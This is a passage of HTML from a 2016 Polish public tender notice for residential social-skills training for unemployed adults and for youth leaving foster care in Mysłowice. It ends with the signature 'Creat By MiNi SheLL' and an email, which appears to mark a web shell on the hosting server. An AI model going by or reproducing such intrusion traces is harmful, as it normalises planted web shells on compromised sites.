style="padding-left: 20px"></div><b> Termin i warunki zamknięcia licytacji elektronicznej</b><br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy
              <br /><div style="padding-left: 20px"></div><br /><b> Wymagania dotyczące zabezpieczenia należytego wykonania umowy</b><br /><div style="padding-left: 20px"></div><br /><b> Dodatkowe informacje:</b><br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak
           
                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie, w formie aneksu do umowy, pod rygorem nieważności takiej zmiany z przyczyn niezależnych od wykonawcy w zakresie osób prowadzących szkolenie pod warunkiem, że będą to osoby o doświadczeniu, wykształceniu i kwalifikacjach nie gorszych od doświadczenia, wykształcenia i kwalifikacji kadry wykazanej w załączniku do oferty, miejsca szkolenia pod warunkiem, że będzie ono spełniać warunki określone w siwz oraz terminu realizacji umowy z przyczyn nie leżących po stronie wykonawcy (np. choroba uczestników szkolenia).<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br />
              Środki służące ochronie informacji o charakterze poufnym
              <br /><br /><b>IV.6.2) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert: </b>09/08/2016 godzina: 12:00, 
                <br />
                Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
                <br />
                  nie
                <br />
                Wskazać powody:
                <br /><br /><b>Język lub języki, w jakich  muszą być sporządzone wnioski o dopuszczenie do udziału w postępowaniu lub oferty</b>polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                do: 31/08/2016<br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                tak
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b><br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                  ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
                </u></div><div><b>Część nr: </b>1
                    
                  <b>Nazwa: </b>Trening kompetencji społecznych dla osób bezrobotnych oraz nieaktywnych zawodowo<br /><div style="padding-left: 20px"><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia: </b>Liczba uczestników: 20 osób dorosłych  uczestników/uczestniczek projektu 
Liczba dzieci wymagających opieki podczas zajęć ich rodzica: 10 (w wieku od 2 do 12 lat) 
Czas trwania: 5 dni (4 noclegi) w terminie: 23.08-29.08.2016 r. (pobyt powinien rozpocząć się           i zakończyć obiadem) 
Liczba godzin zajęć w formie warsztatów: 35 godzin lekcyjnych na osobę (5 dni) 

Program szkolenia do zrealizowania: 
Dzień 1 wyjazd z parkingu przy ul. Gwarków w Mysłowicach (obok boiska sportowego), pobyt zaczyna się od obiadu. 
Program szkolenia (35 godzin lekcyjnych) powinien  obejmować m.in. następującą tematykę: 
autodiagnoza (słabe i mocne strony, uzdolnienia), 
efektywna automotywacja (pasje i zainteresowania, potrzeby i pragnienia), 
wzmacnianie poczucia własnej wartości. 
komunikacja interpersonalna i asertywność w kontaktach międzyludzkich; właściwe odbieranie przekazu (aktywne słuchanie), konstruktywne wyrażanie siebie (komunikat JA), niewerbalne środki wyrazu (m.in. mowa ciała), zakłócenia w komunikowaniu się, budowanie pozytywnych relacji interpersonalnych (asertywna krytyka, pochwała, prośba, odmowa), stawianie i obrona swoich granic 
radzenie sobie ze stresem; rozpoznawanie bodźców-stresorów, analiza reakcji i zachowań w stresie - profil odporności psychicznej, skutki przewlekłego stresu, konstruktywne sposoby radzenia sobie ze stresem (eliminacja/akceptacja), ćwiczenia z technik psychorelaksacyjnych. 
zarządzanie konfliktem i konstruktywne rozwiązywanie konfliktów; przyczyny i fazy konfliktu, własne emocje i reakcje w sytuacjach konfliktu (mechanizmy obronne), polubowne sposoby rozwiązywania sporów (negocjowanie, szukanie rozwiązań), ćwiczenia z technik zastępowania agresji, zarządzanie emocjami 
stawianie sobie nowych wyzwań; wyznaczanie celów i strategii ich osiągania zgodnie z wartościami (metoda SMART), wzmocnienie pewności siebie i swojej sprawczości, proces podejmowania decyzji podsumowanie szkolenia (przypomnienie i utrwalenie wszystkich poruszanych tematów). 

Szkolenie kończy się obiadem i odwiezieniem uczestników szkolenia do Mysłowic, na parking przy boisku sportowym na ul. Gwarków. 
Szczegółowy program szkolenia oraz harmonogram pobytu wykonawca jest zobowiązany dostarczyć zamawiającemu w terminie określonym w umowie, a zamawiający ma prawo nanieść poprawki w programie szkolenia oraz harmonogramie. Wykonawca zobowiązany jest do prowadzenia list obecności oraz dziennika zajęć, opatrzonych wymaganymi logotypami (udostępnionymi przez  zamawiającego). 
Cel szkolenia: Podniesienie kompetencji społecznych uczestników projektu (szczególnie w w/w zakresach). Osiągnięcie celu należy udokumentować wykorzystując odpowiednie narzędzia pomiaru efektywności szkolenia (kwestionariusze ankiet, testy itp.) Szkolenie grupowe powinno zakończyć się także wydaniem odpowiedniego certyfikatu, opatrzonego wymaganymi logotypami (udostępnionymi przez  zamawiającego).
Materiały dydaktyczne i inne: Wykonawca w celu realizacji przedmiotu zamówienia zapewni optymalną ilość materiałów niezbędnych do przeprowadzenia spotkań (np. podręcznik w wydaniu książkowym o treści zgodnej z tematyką spotkań, zeszyt min. 60 kartkowy, ołówek, długopis, teczka na materiały szkoleniowe). 

Kadra
Wykonawca zapewni odpowiednio wykwalifikowaną kadrę, której powierzy realizację przedmiotu  zamówienia.                                                        
Wymagania wobec kadry prowadzącej kurs:
- doświadczenie w prowadzeniu szkoleń  podanej tematyce dla osób bezrobotnych- min. 3 szkolenia w ostatnich 3 latach, dla grupy min. 10 osób.
- wykształcenie wyższe psychologiczne, uprawnienia trenerskie ( poparte odpowiednimi certyfikatami), adekwatne do tematyki szkolenia.

Opieka nad uczestnikami: Wykonawca zapewni ze swej strony koordynatora działań pobytu odpowiedzialnego za: zbiórkę, dowóz uczestników wyjazdu (z dziećmi) tam i z powrotem, zapewnienie bezpieczeństwa, organizację zajęć szkoleniowych oraz czasu wolnego i wypoczynku. 

Opieka nad dziećmi: 
1. Wykonawca na czas nieobecności osób dorosłych (odbywających zajęcia w ramach nin. zamówienia) winien zapewnić opiekę nad małoletnimi dziećmi dostosowaną do wieku dzieci i sprawowaną przez doświadczoną kadrę (2 opiekunki). 
2. Wykonawca winien zapewnić co najmniej 3 propozycje animacji dla dzieci, także podczas niesprzyjających warunków atmosferycznych (w szczególności: zabawy ruchowe na powietrzu, spacer po okolicy z możliwością zwiedzenia miejscowych atrakcji, kino, przejście na miejscowy plac zabaw, zajęcia plastyczno-ruchowe na terenie Ośrodka itp). W trakcie zajęć nad zbiornikami wody, wykonawca jest zobowiązany zapewnić opiekę ratownika. 

Zakwaterowanie: 
1.Obiekt posiadający udogodnienia dla rodzin z małymi dziećmi oraz osób niepełnosprawnych o standardzie pokoi 3 *** w rozumieniu Rozporządzenia Ministra Sportu i Turystyki z dnia 16 listopada 2011r zmieniającym rozporządzenie w sprawie obiektów hotelarskich i innych obiektów, w których świadczone są usługi hotelarskie (Dz.U. z 2011r Nr 259 poz. 1553) powinien: mieścić się w miejscowości atrakcyjnej pod względem turystycznym, posiadać salę szkoleniową, miejsce zabaw dla dzieci w budynku Ośrodka, plac zabaw dla dzieci, miejsce do zajęć rekreacyjnych. 
2. Wykonawca zapewni uczestnikom zakwaterowanie w pokojach 2-3 osobowych z pełnym węzłem sanitarnym (tj. umywalką, WC, prysznicem z ciepłą i zimną wodą), wyposażonych w łóżka jednoosobowe, stolik, krzesła oraz szafki na odzież a także z dostępem do TV. Uczestnicy zostaną zakwaterowani w sposób uwzględniający płeć lub rodzinę (rodzic z dziećmi), a w przypadku nieparzystej liczby osób zapewniony zostanie pokój jednoosobowy lub dwuosobowy do pojedynczego wykorzystania. 
3.Wykonawca zapewni dostępność wody mineralnej w pokojach w ilości 1,5 l dziennie/osobę dorosłą. 

Wyżywienie: 
1. Wykonawca zapewni w cenie usługi pełne i urozmaicone wyżywienie polegające na przygotowaniu i zaserwowaniu 3 posiłków dziennie (za wyjątkiem dnia przyjazdu i wyjazdu) na każdego uczestnika wyjazdu w postaci: śniadania w formie szwedzkiego stołu, dwudaniowego obiadu (z porcją mięsa lub ryby) z deserem i napojem oraz kolacji. Zamawiający nie dopuszcza możliwości serwowania ciepłego obiadu w formie dań gotowych typu fast-food oraz gotowych zup typu instant. Ponadto wykonawca winien uwzględnić potrzeby żywieniowe dzieci zapewniając rodzicom na ich życzenie dostęp do takich produktów żywnościowych jak np. gorące mleko, płatki śniadaniowe, czekolada lub kakao w proszku (w szczególności podczas śniadania i kolacji). 
2. W trakcie odbywania zajęć warsztatowych Wykonawca zapewni codziennie uczestnikom poczęstunek w postaci: dobrej jakości kawy i herbaty (bez ograniczeń), mieszanych drobnych artykułów spożywczych (np. paluszki, krakersy, kruche ciasteczka, babeczki, rurki w ilości min. 100 g/osobę), zimnych napojów (np. woda mineralna, soki w ilości 0,5 l/osobę) oraz dodatków takich jak: cukier, mleczko, cytryna. W trakcie sprawowania opieki nad dziećmi, Wykonawca winien zaplanować przerwy w zajęciach animacyjnych, podczas których dzieci będą mogły spożyć drobną przekąskę składającą się z zestawu: np. drożdżówka/pączek/porcja owoców sezonowych oraz napoju np. woda mineralna, soki w ilości 0,5 l/dziecko. 

Transport: 
1. Wykonawca zapewni w cenie usługi transport uczestników (z dziećmi) i ich bagażu na miejsce wykonywania usługi i z powrotem - pojazdem z ilością miejsc pozwalającą na komfortowe, swobodne podróżowanie zgłoszonej do wyjazdu grupie uczestników, sprawnym technicznie, dopuszczonym do ruchu drogowego, przeznaczonym do przewozu dzieci w wieku od 2 do 12 lat. 
2. W drodze powrotnej - na czas podróży, Wykonawca zapewni każdemu uczestnikowi wyjazdu napoje na drogę (np. woda mineralna, soki w ilości 0,5 l/osobę).

Miejsce szkolenia:
Musi znajdować się poza miastem Mysłowice i miastami ościennymi, w miejscowości atrakcyjnej pod względem turystycznym i rekreacyjnym. 

Czas wolny: 
W czasie wolnym od zajęć należy zapewnić uczestnikom oraz ich dzieciom efektywną i atrakcyjną organizację czasu wolnego. Wykonawca winien zapewnić co najmniej 2 formy organizacji czasu wolnego (w tym wycieczkę po okolicy), w szczególności wykorzystując dostępność miejscowych atrakcji takich jak źródła termalne, skanseny dawnej zabudowy, obiekty muzealne (stałe i czasowe ekspozycje), parki krajobrazowe itp. W przypadku, gdy proponowana animacja znajduje się poza obiektem, Wykonawca zapewni transport autokarem tam i z powrotem. 

Wymagania dodatkowe: 
1. Wykonawca winien ubezpieczyć wszystkich uczestników wyjazdu od następstw nieszczęśliwych wypadków na okres od dnia rozpoczęcia realizacji przedmiotu zamówienia do dnia jego zakończenia. 
2. Wykonawca oznaczy pomieszczenie, w którym realizowane będzie szkolenie, zgodnie z logotypami otrzymanymi przez Zamawiającego. 
Odpowiednie oznakowanie winno znaleźć się również na dokumentach związanych z realizacją warsztatów oraz materiałach przekazywanych uczestnikom warsztatów. 
3. Wykonawca zrealizuje dokumentację fotograficzną szkolenia (na płycie CD). 

Zajęcia szkoleniowe, zakwaterowanie, wyżywienie oraz sprawowanie opieki nad dziećmi Wykonawca winien zapewnić w obrębie jednego obiektu
O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania; Wymagany jest wpis do rejestru o którym mowa w ustawie o usługach turystycznych (Dz.U. 2016 poz. 187) opis sposobu dokonania oceny tego warunku: na podstawie przedstawionego wpisu oraz oświadczenia. 





<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80570000-0<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                    Wartość bez VAT:
                    19810<br />
                    Waluta:
                    <br /><div style="padding-left: 20px">
                        PLN
                      <br /><b>4) Czas trwania lub termin wykonania: </b>
                        data zakończenia: 29/08/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td></td></tr></table></div></div><br /></div><div><b>Część nr: </b>2
                    
                  <b>Nazwa: </b>Trening umiejętności społecznych z elementami planowania rodziny  dla osób przebywających bądź opuszczających pieczę zastępczą oraz młodzieży pochodzącej z rodzin zagrożonych wykluczeniem społecznym.<br /><div style="padding-left: 20px"><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia: </b>Liczba uczestników: 14 osób (młodzież w wieku 11-21 lat)  uczestników/uczestniczek projektu
Czas trwania: 5 dni (4 noclegi) w terminie: 23-29.08.2016 r. (pobyt powinien rozpocząć się i zakończyć obiadem) 
Liczba godzin zajęć w formie warsztatów: 32 godziny lekcyjne na osobę (5 dni) 

Program szkolenia: 
Wyjazd z parkingu przy ul. Gwarków w Mysłowicach (obok boiska sportowego), pobyt zaczyna się od obiadu, 
Program szkolenia  powinien zawierać następującą tematykę:
-komunikacja i asertywność w kontaktach międzyludzkich; wyrażanie siebie (komunikat ja"), zakłócenia w komunikowaniu się, budowanie pozytywnych relacji interpersonalnych (asertywna krytyka, pochwała, prośba, odmowa), stawianie i obrona swoich granic (4 godziny lekcyjne)
-zarządzanie konfliktem i jego efektywne rozwiązywanie; przyczyny konfliktów, zapobieganie nieporozumieniom, konstruktywne sposoby rozwiązywania konfliktów i odpowiedzialność za osoby uczestniczące, elementy treningu zastępowania agresji (9 godzin lekcyjnych)
- rodzina i jej funkcje, rozwój psychoseksualny, higiena okresu dojrzewania (4 godziny lekcyjne)
- odpowiedzialne zachowania w sferze płciowości - profilaktyka (przed)wczesnego macierzyństwa oraz chorób przenoszonych drogą płciową, pornografia (4 godziny lekcyjne)
- przyczyny stresu i jego niwelowanie; profil odporności psychicznej, konstruktywne sposoby radzenia sobie ze stresem, ćwiczenia z technik psychorelaksacyjnych (5 godzin lekcyjnych)
- uzależnienia (m.in. Internet, środki psychoaktywne)  4 godziny lekcyjne
- podsumowanie szkolenia (przypomnienie i utrwalenie wszystkich poruszanych tematów)- 2 godziny lekcyjne

Szkolenie kończy się obiadem i odwiezieniem uczestników szkolenia do Mysłowic na parking przy boisku sportowym na ul. Gwarków. 
Szczegółowy program szkolenia oraz harmonogram pobytu wykonawca jest zobowiązany dostarczyć zamawiającemu w terminie określonym w umowie, a zamawiający ma prawo nanieść poprawki w programie szkolenia oraz harmonogramie. Wykonawca zobowiązany jest do prowadzenia list obecności oraz dziennika zajęć, opatrzonych wymaganymi logotypami (udostępnionymi przez  zamawiającego). 

Cel szkolenia: Nabycie umiejętności społecznych związanych m.in. z planowaniem rodziny. Osiągnięcie celu należy udokumentować wykorzystując odpowiednie narzędzia pomiaru efektywności szkolenia (kwestionariusze ankiet, testy itp.) Szkolenie grupowe powinno zakończyć się także wydaniem odpowiedniego certyfikatu, opatrzonego wymaganymi logotypami (udostępnionymi przez  zamawiającego).
Materiały dydaktyczne i inne: Wykonawca w celu realizacji przedmiotu zamówienia zapewni optymalną ilość materiałów niezbędnych do przeprowadzenia spotkań (np. podręcznik w wydaniu książkowym o treści zgodnej z tematyką spotkań, zeszyt min. 60 kartkowy, ołówek, długopis, teczka na materiały szkoleniowe). 

Kadra
Wykonawca zapewni odpowiednio wykwalifikowaną kadrę, której powierzy realizację przedmiotu  zamówienia.                                                        
Wymagania wobec kadry prowadzącej kurs:
- doświadczenie w prowadzeniu szkoleń  podanej tematyce dla młodzieży - min. 3 szkolenia w ostatnich 3 latach, dla grupy min. 10 osób.
- wykształcenie wyższe psychologiczne, uprawnienia trenerskie ( poparte odpowiednimi certyfikatami), adekwatne do tematyki szkolenia.

Opieka nad uczestnikami: Wykonawca zapewni ze swej strony  osobę szkolącą oraz opiekuna przez całą dobę - również na czas podróży - w tym koordynatora działań pobytu odpowiedzialnego za: zbiórkę, dowóz uczestników wyjazdu tam i z powrotem, zapewnienie bezpieczeństwa, organizację zajęć oraz czasu wolnego i wypoczynku. 

Zakwaterowanie: 
1.Obiekt o standardzie pokoi 3 *** w rozumieniu Rozporządzenia Ministra Sportu i Turystyki z dnia 16 listopada 2011r zmieniającym rozporządzenie w sprawie obiektów hotelarskich i innych obiektów, w których świadczone są usługi hotelarskie (Dz.U. z 2011r Nr 259 poz. 1553) powinien: mieścić się w miejscowości atrakcyjnej pod względem turystycznym, posiadać salę szkoleniową, miejsce zabaw dla dzieci w budynku Ośrodka, plac zabaw dla dzieci, miejsce do zajęć rekreacyjnych. 
2. Wykonawca zapewni uczestnikom zakwaterowanie w pokojach 2-4 osobowych z pełnym węzłem sanitarnym (tj. umywalką, WC, prysznicem z ciepłą i zimną wodą) wyposażonych w łóżka jednoosobowe, stolik, krzesła oraz szafki na odzież, z dostępem do TV. Uczestnicy zostaną zakwaterowani w sposób uwzględniający płeć, a w przypadku nieparzystej liczby osób zapewniony zostanie pokój jednoosobowy lub dwuosobowy do pojedynczego wykorzystania. 
3. Wykonawca zapewni dostępność wody mineralnej w pokojach w ilości 1,5 l dziennie/osobę. 

Wyżywienie: 
1.Wykonawca zapewni w cenie usługi pełne i urozmaicone wyżywienie polegające na przygotowaniu i zaserwowaniu 3 posiłków dziennie (za wyjątkiem dnia przyjazdu i wyjazdu) na każdego uczestnika wyjazdu w postaci: śniadania w formie szwedzkiego stołu, dwudaniowego obiadu (z porcją mięsa lub ryby) z deserem i napojem oraz kolacji. Zamawiający nie dopuszcza możliwości serwowania ciepłego obiadu w formie dań gotowych typu fast-food oraz gotowych zup typu instant. 
2. W trakcie odbywania zajęć warsztatowych Wykonawca zapewni codziennie uczestnikom poczęstunek w postaci: dobrej jakości kawy i herbaty (bez ograniczeń), mieszanych drobnych artykułów spożywczych (np. paluszki, krakersy, kruche ciasteczka, babeczki, rurki w ilości min. 100 g/osobę), zimnych napojów (np. woda mineralna, soki w ilości 0,5 l/osobę) oraz dodatki takie jak: cukier, mleczko, cytryna. 

Transport: 
1. Wykonawca zapewni w cenie usługi transport uczestników i ich bagażu na miejsce wykonywania usługi i z powrotem - pojazdem z ilością miejsc pozwalającą na komfortowe, swobodne podróżowanie zgłoszonej do wyjazdu grupie uczestników, sprawnym technicznie, dopuszczonym do ruchu drogowego. 
2. W drodze powrotnej - na czas podróży, Wykonawca zapewni każdemu uczestnikowi wyjazdu napoje na drogę (np. woda mineralna, soki w ilości 0,5 l/osobę). 

Czas wolny: 
W czasie wolnym od zajęć należy zapewnić uczestnikom efektywną i atrakcyjną organizację czasu wolnego. Wykonawca winien zapewnić co najmniej 2 formy organizacji czasu wolnego (w tym wycieczkę po okolicy), w szczególności wykorzystując dostępność miejscowych atrakcji takich jak źródła termalne, skanseny dawnej zabudowy, obiekty muzealne (stałe i czasowe ekspozycje), parki krajobrazowe itp. W przypadku, gdy proponowana animacja znajduje się poza obiektem, Wykonawca zapewni transport autokarem tam i z powrotem. W trakcie zajęć nad zbiornikami wody, wykonawca jest zobowiązany zapewnić opiekę ratownika.
Miejsce szkolenia:
Musi znajdować się poza miastem Mysłowice i miastami ościennymi, w miejscowości atrakcyjnej pod względem turystycznym i rekreacyjnym. 

Wymagania dodatkowe: 
1. Wykonawca ubezpieczy wszystkich uczestników wyjazdu od następstw nieszczęśliwych wypadków na okres od dnia rozpoczęcia realizacji przedmiotu zamówienia do dnia jego zakończenia. 
2. Wykonawca oznaczy pomieszczenie, w którym realizowane będzie szkolenie, zgodnie z logotypami otrzymanymi przez Zamawiającego. 
Odpowiednie oznakowanie winno znaleźć się również na dokumentach związanych z realizacja warsztatów oraz materiałach przekazywanych uczestnikom warsztatów. 
3. Wykonawca zrealizuje dokumentację fotograficzną szkolenia (na płycie CD). 
Zajęcia szkoleniowe, zakwaterowanie oraz wyżywienie dla uczestników Wykonawca zapewni w obrębie jednego obiektu. 
 
O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania; Wymagany jest wpis do rejestru o którym mowa w ustawie o usługach turystycznych (Dz.U. 2016 poz. 187) opis sposobu dokonania oceny tego warunku: na podstawie przedstawionego wpisu oraz oświadczenia. 
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80570000-0<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                    Wartość bez VAT:
                    19810<br />
                    Waluta:
                    <br /><div style="padding-left: 20px">
                        PLN
                      <br /><b>4) Czas trwania lub termin wykonania: </b>
                        data zakończenia: 29/08/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td></td></tr></table></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com